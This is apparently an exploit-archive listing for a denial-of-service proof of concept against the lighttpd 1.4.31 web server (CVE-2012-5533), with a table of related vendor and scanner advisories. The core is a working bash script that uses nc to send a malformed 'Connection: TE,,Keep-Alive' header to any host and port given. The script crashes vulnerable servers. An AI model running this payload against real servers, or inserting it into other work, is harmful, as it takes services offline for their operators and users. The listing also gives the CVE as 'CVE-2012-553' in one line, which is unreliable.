lighttpd 1.4.31 Denial of Service PoC

🗓️ 21 Nov 2012 00:00:00Reported by t4cType

zdt🔗 0day.today👁 46 Views

lighttpd 1.4.31 Denial of Service PoC. Exploits CVE-2012-553

Reporter	Title	Published	Views	Family All 39
FreeBSD	lighttpd -- remote DoS in header parsing	17 Nov 201200:00	–	freebsd
Amazon	Medium: lighttpd	11 Apr 201300:00	–	amazon
Tenable Nessus	Amazon Linux AMI : lighttpd (ALAS-2013-179)	4 Sep 201300:00	–	nessus
Tenable Nessus	Fedora 18 : lighttpd-1.4.32-1.fc18 (2013-15344)	4 Sep 201300:00	–	nessus
Tenable Nessus	Fedora 19 : lighttpd-1.4.32-1.fc19 (2013-15345)	4 Sep 201300:00	–	nessus
Tenable Nessus	FreeBSD : lighttpd -- remote DoS in header parsing (1cd3ca42-33e6-11e2-a255-5404a67eef98)	23 Nov 201200:00	–	nessus
Tenable Nessus	GLSA-201406-10 : lighttpd: Multiple vulnerabilities	16 Jun 201400:00	–	nessus
Tenable Nessus	lighttpd 1.4.31 http_request_split_value Function Header Handling DoS	29 Nov 201200:00	–	nessus
Tenable Nessus	Mandriva Linux Security Advisory : lighttpd (MDVSA-2013:100)	20 Apr 201300:00	–	nessus
Tenable Nessus	openSUSE Security Update : lighttpd (openSUSE-SU-2012:1532-1)	13 Jun 201400:00	–	nessus

#!/bin/bash
# Exploit Title: simple lighttpd 1.4.31 DOS POC
# Date: 11/21/2012
# Exploit Author: [email protected]
# Vendor Homepage: http://www.lighttpd.net
# Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz
# Version: 1.4.31
# Tested on: Debian Linux, Gentoo Linux, Arch Linux
# CVE: CVE-2012-5533
 
if [ $# -lt 2 ]
then
    echo "usage :$0 <Host/IP> <Port>"
else
    echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2
fi

#  0day.today [2018-03-31]  #

21 Nov 2012 00:00Current

7High risk

Vulners AI Score7

EPSS0.37913